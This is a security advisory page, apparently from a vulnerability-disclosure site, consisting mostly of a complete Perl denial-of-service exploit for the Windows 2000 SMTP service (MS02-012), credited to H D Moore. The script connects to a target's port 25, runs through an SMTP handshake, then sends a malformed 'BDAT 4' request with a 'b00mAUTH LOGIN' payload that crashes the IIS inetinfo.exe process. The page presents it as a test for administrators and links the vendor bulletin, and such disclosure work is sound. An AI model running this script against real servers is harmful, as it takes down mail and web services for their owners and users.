|
|
|
|
| |
| As we reported in our previous article: Malformed Data Transfer Request Causes Windows SMTP Service to Fail, it is possible to cause Microsoft's SMTP server to crash by sending it a malformed BDAT request. The following is an exploit code that can be used by administrators to test their server for the vulnerability.
|
| |
Credit:
The information has been provided by H D MooreA.
|
| |
Exploit:
#!/usr/bin/perl -w
##################
#
#
# URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
# Denial of Service attack through the BDAT command. If exploited, this
# vulnerability will cause any and all services running under IIS (the
# inetinfo.exe process) to become unavailable.
#
#
# Solution:
#
# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#
use IO::Socket;
$target = shift() || "127.0.0.1";
my $port = 25;
my $rcpt = "Administrator";
my $from = "crash\@burn.com";
my $sock = IO::Socket::INET->new (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp'
) || die "could not connect: $!";
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
print STDERR "Error: invalid server response '$banner'.\n";
exit(1);
}
print $sock "HELO $target\r\n";
$resp = <$sock>;
print $sock "MAIL FROM: $from\r\n";
$resp = <$sock>;
print $sock "RCPT TO: $rcpt\r\n";
$resp = <$sock>;
print $sock "BDAT 4\r\n";
print $sock "b00mAUTH LOGIN\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
|
|
|
